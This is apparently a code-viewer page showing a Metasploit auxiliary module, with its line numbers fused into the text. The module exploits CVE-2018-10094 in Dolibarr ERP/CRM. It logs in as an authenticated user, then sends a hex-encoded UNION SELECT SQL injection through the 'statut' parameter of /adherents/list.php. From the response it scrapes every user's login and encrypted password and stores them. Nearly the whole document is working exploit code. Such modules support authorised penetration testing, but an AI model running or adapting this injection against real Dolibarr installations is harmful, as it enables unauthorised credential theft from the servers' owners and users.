Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/auxiliary/gather/dolibarr_creds_sqli.rb
Views: 11623
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient78def initialize(info = {})9super(update_info(info,10'Name' => 'Dolibarr Gather Credentials via SQL Injection',11'Description' => %q{12This module enables an authenticated user to collect the usernames and13encrypted passwords of other users in the Dolibarr ERP/CRM via SQL14injection.15},16'Author' => [17'Issam Rabhi', # PoC18'Kevin Locati', # PoC19'Shelby Pace', # Metasploit Module20],21'License' => MSF_LICENSE,22'References' => [23[ 'CVE', '2018-10094' ],24[ 'EDB', '44805']25],26'DisclosureDate' => '2018-05-30'27))2829register_options(30[31OptString.new('TARGETURI', [ true, 'The base path to Dolibarr', '/' ]),32OptString.new('USERNAME', [ true, 'The username for authenticating to Dolibarr', 'admin' ]),33OptString.new('PASSWORD', [ true, 'The password for authenticating to Dolibarr', 'admin' ])34])35end3637def check_availability38login_page = target_uri.path.end_with?('index.php') ? normalize_uri(target_uri.path) : normalize_uri(target_uri.path, '/index.php')39res = send_request_cgi(40'method' => 'GET',41'uri' => normalize_uri(login_page)42)4344return false unless res && res.body.include?('Dolibarr')4546return res47end4849def login(response)50return false unless response5152login_uri = target_uri.path.end_with?('index.php') ? normalize_uri(target_uri.path) : normalize_uri(target_uri.path, '/index.php')53cookies = response.get_cookies54print_status("Logging in...")5556login_res = send_request_cgi(57'method' => 'POST',58'uri' => login_uri,59'cookie' => cookies,60'vars_post' => {61'username' => datastore['USERNAME'],62'password' => datastore['PASSWORD'],63'loginfunction' => 'loginfunction'64}65)6667unless login_res && login_res.body.include?('id="mainmenua_members"')68fail_with(Failure::NoAccess, "Couldn't log into Dolibarr")69end7071print_good("Successfully logged into Dolibarr")72return cookies73end7475def get_info(cookies)76inject_uri = target_uri.path.end_with?('index.php') ? target_uri.path.gsub('index.php', '') : target_uri.path77inject_uri <<= "/adherents/list.php?leftmenu=members&statut="78cmd = "1) union select 0,1,login,pass_crypted,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from llx_user #"79cmd = Rex::Text.uri_encode(cmd, 'hex-all')80inject_uri <<= cmd8182inject_res = send_request_cgi(83'method' => 'GET',84'uri' => normalize_uri(inject_uri),85'cookie' => cookies86)8788unless inject_res && inject_res.body.include?('id="searchFormList"')89fail_with(Failure::NotFound, "Failed to access page. The user may not have permissions.")90end9192print_good("Accessed credentials")93format_results(inject_res.body)94end9596def format_results(output)97credentials = output.scan(/valignmiddle">0<\/div><\/a><\/td>.<td>([a-zA-Z0-9]*)<\/td>.<td>(\S*)<\/td>/m)9899fail_with(Failure::NotFound, "No credentials found") if credentials.empty?100101credentials.each do |i, j|102print_good("#{j} #{i}")103store_valid_credential(user: j, private: i)104end105end106107def run108available_res = check_availability109fail_with(Failure::NotFound, "Could not access the Dolibarr webpage") unless available_res110111cookies = login(available_res)112fail_with(Failure::NoAccess, "Could not log in. Verify credentials") unless cookies113114get_info(cookies)115end116end117118119